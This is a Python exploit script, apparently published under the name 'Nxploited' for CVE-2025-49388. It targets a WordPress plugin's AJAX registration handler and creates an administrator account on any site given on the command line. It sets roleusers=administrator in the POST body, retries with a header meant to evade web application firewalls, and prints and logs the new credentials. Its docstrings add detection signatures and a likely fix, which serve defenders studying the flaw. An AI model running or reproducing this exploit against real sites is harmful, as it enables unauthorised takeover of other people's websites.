#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# By Khaled ALenazi ( Nxploited )
# Requires: requests, colorama
# Install: pip install requests colorama
import sys
# Interpreter guard for Python 2. The file also uses f-strings further down,
# which a Python 2 interpreter rejects at compile time, before this check
# can execute.
if sys.version_info < (3,):
    print("This script requires Python 3.x!")
    sys.exit(1)
# Optional colour support. When colorama is not installed, Fore and Style are
# bound to one shared stand-in object whose colour attributes are empty strings.
# The stand-in defines only RESET, RED, GREEN, YELLOW and CYAN; Fore.WHITE and
# Style.RESET_ALL, which are read elsewhere in this file, are not among them.
try:
    from colorama import Fore, Style, init
    init(autoreset=True)
except ImportError:
    class Dummy:
        RESET = ''
        RED = ''
        GREEN = ''
        YELLOW = ''
        CYAN = ''
    Fore = Dummy()
    Style = Fore
import argparse
import requests
import random
import string
import time
import urllib3
import socket
import re
# The POST later in this file is sent with verify=False, so the server
# certificate is never validated. This call silences the InsecureRequestWarning
# that urllib3 would otherwise print for each such request.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
def Nxploited_generate_headers():
    """Build the HTTP headers sent with the registration POST.

    A new dict is returned on every call. The User-Agent is picked at random
    from five fixed strings and the cookie value is random; every other value
    is a constant.

    All five User-Agent strings contain the token ``Nxploited``. The
    ``Nxploited-By`` header, the ``NxploitedID`` cookie name, the Referer and
    the Origin value are fixed literals, so traffic from an unmodified copy of
    this script can be matched on them wherever those request fields are
    logged or inspected.
    """
    user_agent_pool = (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited",
        "Mozilla/5.0 (X11; Linux x86_64) Nxploited",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited",
        "Nxploited/1.0 (compatible;)",
        "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Nxploited",
    )
    # The cookie is built before the User-Agent is chosen, matching the order
    # in which the random generator is consumed.
    session_cookie = f"NxploitedID={Nxploited_random_string(16)}"
    chosen_agent = random.choice(user_agent_pool)

    header_pairs = [
        ("User-Agent", chosen_agent),
        ("Accept", "*/*"),
        ("Connection", "close"),
        ("Referer", "https://google.com/Nxploited"),
        ("X-Requested-With", "XMLHttpRequest"),
        ("Nxploited-By", "Nxploited"),
        ("Accept-Encoding", "gzip, deflate"),
        ("Content-Type", "application/x-www-form-urlencoded"),
        ("Cookie", session_cookie),
        ("Cache-Control", "no-cache"),
        ("Pragma", "no-cache"),
        ("Upgrade-Insecure-Requests", "1"),
        ("Origin", "Nxploited"),
    ]
    return dict(header_pairs)
def Nxploited_random_string(length=8):
    """Return ``length`` characters drawn from ASCII letters and digits.

    The characters come from the ``random`` module, which is not a
    cryptographic source. In this file the result is used only as a cookie
    value and as a request-header value.
    """
    alphabet = string.ascii_letters + string.digits
    picked = []
    for _ in range(length):
        picked.append(random.choice(alphabet))
    return ''.join(picked)
def Nxploited_build_payload(username, full_name, useremail, password):
    """Return the form fields that are posted to ``admin-ajax.php``.

    ``action`` selects the AJAX handler by name and ``roleusers`` is always
    the constant ``"administrator"``: the role being requested travels in the
    request body, chosen by the client. ``confirmpass`` repeats ``password``.

    For detection, a POST to ``/wp-admin/admin-ajax.php`` that carries this
    ``action`` together with ``roleusers=administrator`` is the request shape
    this script produces.
    NOTE(review): presumably the server-side fix is for the handler to ignore
    or allow-list the role field; confirm against the advisory for the CVE
    named in this file's argparse description.
    """
    form = {"action": "miraculous_user_register_form"}
    form["username"] = username
    form["full_name"] = full_name
    form["useremail"] = useremail
    form["password"] = password
    form["confirmpass"] = password
    form["roleusers"] = "administrator"
    return form
def Nxploited_extract_host_port(url):
    """Split the authority part of ``url`` into a ``(host, port)`` tuple.

    The authority is taken as the third ``/``-separated piece of ``url``, so a
    URL without ``scheme://`` raises ``IndexError``. When no usable port is
    present the port defaults to 443 if ``url`` starts with ``https`` and to
    80 otherwise.

    Handled forms:
      * ``[v6-literal]`` or ``[v6-literal]:port``: the brackets are removed.
        A bracketed value that does not match that shape is returned
        unchanged as the host.
      * ``host:port``: split on the last colon; a non-numeric port falls back
        to the default.
      * ``host``: returned with the default port.

    Nothing here strips a ``user:pass@`` prefix; it stays part of the result.
    """
    authority = url.split("/")[2]
    fallback_port = 443 if url.startswith("https") else 80

    # Bracketed IPv6 literal, optionally followed by :port.
    if authority.startswith("["):
        bracketed = re.match(r"^\[([^\]]+)\](?::(\d+))?$", authority)
        if not bracketed:
            return authority, fallback_port
        explicit_port = bracketed.group(2)
        return bracketed.group(1), (int(explicit_port) if explicit_port else fallback_port)

    if ":" not in authority:
        return authority, fallback_port

    host, raw_port = authority.rsplit(":", 1)
    try:
        return host, int(raw_port)
    except ValueError:
        return host, fallback_port
def Nxploited_check_network(host, port=80, timeout=5):
    """Return True when a TCP connection to ``(host, port)`` can be opened.

    The probe uses an ``AF_INET`` stream socket, i.e. IPv4 TCP. The timeout is
    applied with ``socket.setdefaulttimeout``, which changes the default for
    every socket created afterwards in the process, not just this one. Any
    exception raised along the way is swallowed and reported as False. The
    socket is closed only on the success path.
    """
    reachable = False
    try:
        socket.setdefaulttimeout(timeout)
        probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        probe.connect((host, port))
        probe.close()
        reachable = True
    except Exception:
        reachable = False
    return reachable
def Nxploited_safe_request(url, data, headers, retries=5, timeout=12):
    """POST ``data`` to ``url`` and return the response, retrying on failure.

    Up to ``retries`` attempts are made, each with a fresh
    ``requests.Session`` limited to 10 redirects. The request is sent with
    ``verify=False``, so the server's TLS certificate is not validated.

    A 403, 406 or 429 response is treated as a block: the caller's ``headers``
    dict is modified in place by setting ``Nxploited-Bypass`` to a new random
    12-character value, and after one second the request is retried. The
    header name is a fixed literal, so it identifies these retries wherever
    request headers are logged. Any other status code is returned to the
    caller as-is.

    Too-many-redirects errors retry immediately; timeouts and other
    ``requests`` exceptions retry after a delay that grows with the attempt
    number. When every attempt has been used, an error is printed and the
    process exits with status 1, so this function never returns None.
    """
    blocked_statuses = (403, 406, 429)

    for attempt in range(retries):
        try:
            http = requests.Session()
            http.max_redirects = 10
            reply = http.post(
                url,
                data=data,
                headers=headers,
                timeout=timeout,
                verify=False,
                allow_redirects=True,
            )
            if reply.status_code not in blocked_statuses:
                return reply
            Nxploited_print_status(f"Possible WAF detected (HTTP {reply.status_code}), attempt bypass...", warn=True)
            headers["Nxploited-Bypass"] = Nxploited_random_string(12)
            time.sleep(1)
        except requests.exceptions.TooManyRedirects:
            Nxploited_print_status("Too many redirects, retrying with new session.", warn=True)
        except requests.exceptions.Timeout:
            Nxploited_print_status("Timeout, increasing wait and retrying.", warn=True)
            time.sleep(3 + attempt)
        except requests.exceptions.RequestException as e:
            Nxploited_print_status(f"Attempt {attempt + 1}: {e!s}", warn=True)
            time.sleep(2 + attempt)

    Nxploited_print_status("All connection attempts failed.", error=True)
    sys.exit(1)
def Nxploited_print_status(msg, success=False, warn=False, error=False):
    """Print ``msg`` with a severity prefix and colour.

    Exactly one level is used, in this order of precedence: ``success``,
    ``warn``, ``error``. With none set the message is printed as INFO.
    ``Fore.WHITE`` is read on every call, whichever level is chosen, and
    ``Style.RESET_ALL`` is appended to every line.
    """
    label = "[Nxploited INFO]"
    tint = Fore.WHITE

    levels = (
        (success, "[Nxploited SUCCESS]", "GREEN"),
        (warn, "[Nxploited WARNING]", "YELLOW"),
        (error, "[Nxploited ERROR]", "RED"),
    )
    # First flag that is set wins; the colour attribute is looked up only for
    # that level.
    for enabled, tag, colour_name in levels:
        if enabled:
            label = tag
            tint = getattr(Fore, colour_name)
            break

    print(f"{tint}{label} {msg}{Style.RESET_ALL}")
def Nxploited_check_success(response_text):
    """Return True when the response body contains the registration success text.

    The verdict rests only on the substring ``You are successfully
    registered`` appearing in ``response_text``; nothing here confirms that an
    account exists or which role it received. On a negative result the whole
    response body is printed to stdout.
    """
    registered = 'You are successfully registered' in response_text
    if not registered:
        Nxploited_print_status("Exploit attempt failed or protection in place.", error=True)
        print(Fore.YELLOW + "[Nxploited DEBUG] Response Body:\n" + response_text + Style.RESET_ALL)
        return False

    Nxploited_print_status("Exploitation succeeded! Nxploited By Nxploited", success=True)
    return True
def Nxploited_show_credentials(username, password, useremail):
    """Print the submitted username, password and e-mail to stdout in cyan.

    The password is written in clear text, so it ends up in any terminal
    scrollback or captured output of the run.
    """
    banner = Fore.CYAN + "\n[Nxploited CREDENTIALS]" + Style.RESET_ALL
    print(banner)
    user_line = Fore.CYAN + f"Username : {username}"
    print(user_line)
    pass_line = Fore.CYAN + f"Password : {password}"
    print(pass_line)
    mail_line = Fore.CYAN + f"Email : {useremail}" + Style.RESET_ALL
    print(mail_line)
def Nxploited_log_to_file(filename, msg):
    """Append ``msg`` plus a newline to ``filename`` as UTF-8.

    Best effort: every exception is swallowed, so a failed write (missing
    directory, permissions, non-string ``msg``) leaves no trace and the
    function still returns None.
    """
    try:
        with open(filename, mode="a", encoding="utf-8") as sink:
            line = msg + "\n"
            sink.write(line)
    except Exception:
        return None
    return None
def Nxploited_main():
    """Parse the command line, send one registration request and report the result.

    Flow: normalise the URL (``http://`` is prepended when no scheme is
    given), append ``/wp-admin/admin-ajax.php``, run a TCP reachability check
    against the host and port taken from the URL, then POST the registration
    form and judge the outcome from the response body.

    When ``--output`` is given, the outcome is appended to that file. On
    success the line written contains the username, password and e-mail in
    plain text.

    NOTE(review): the default e-mail literal reads like an e-mail-protection
    placeholder left by page extraction rather than an address; it is kept
    exactly as found.
    """
    cli = argparse.ArgumentParser(description="CVE-2025-49388 (Nxploited Edition)")
    cli.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
    cli.add_argument("-un", "--username", default="Nxploited_admin", help="Username to register (default: Nxploited_admin)")
    cli.add_argument("-fn", "--full_name", default="Nxploited", help="Full name (default: Nxploited)")
    cli.add_argument("-em", "--useremail", default="[email protected]", help="Email (default: [email protected])")
    cli.add_argument("-pw", "--password", default="Str0ng!Pass123", help="Password (default: Str0ng!Pass123)")
    cli.add_argument("-o", "--output", default=None, help="Write results and log to this file")
    opts = cli.parse_args()

    if not opts.url.startswith(("http://", "https://")):
        opts.url = "http://" + opts.url
    # After the step above the URL always starts with "http", so this branch
    # cannot trigger.
    if not opts.url.startswith('http'):
        Nxploited_print_status("URL must start with http or https.", error=True)
        sys.exit(1)

    target = opts.url.rstrip("/") + "/wp-admin/admin-ajax.php"

    host, port = Nxploited_extract_host_port(opts.url)
    reachable = Nxploited_check_network(host, port)
    if not reachable:
        Nxploited_print_status(f"Host not reachable ({host}:{port}). Check your network or target address.", error=True)
        sys.exit(1)

    headers = Nxploited_generate_headers()
    data = Nxploited_build_payload(opts.username, opts.full_name, opts.useremail, opts.password)

    Nxploited_print_status(f"Target: {target}")
    Nxploited_print_status("Starting exploitation attempt...")
    response = Nxploited_safe_request(target, data, headers)

    if Nxploited_check_success(response.text):
        Nxploited_show_credentials(opts.username, opts.password, opts.useremail)
        outcome_line = f"[SUCCESS]\nUsername: {opts.username}\nPassword: {opts.password}\nEmail: {opts.useremail}\n"
    else:
        Nxploited_print_status("Target might be patched, protected, or blocking requests.", warn=True)
        outcome_line = "[FAILED] Target might be patched/protected.\n"

    # Same log call on both paths; only the text differs.
    if opts.output:
        Nxploited_log_to_file(opts.output, outcome_line)
# Script entry point. Exceptions derived from Exception are reported through
# the status printer and turned into exit status 1. SystemExit raised by the
# sys.exit() calls inside the script is not an Exception subclass and passes
# through untouched.
if __name__ == "__main__":
    try:
        Nxploited_main()
    except Exception as err:
        Nxploited_print_status(f"Unexpected error: {err}", error=True)
        sys.exit(1)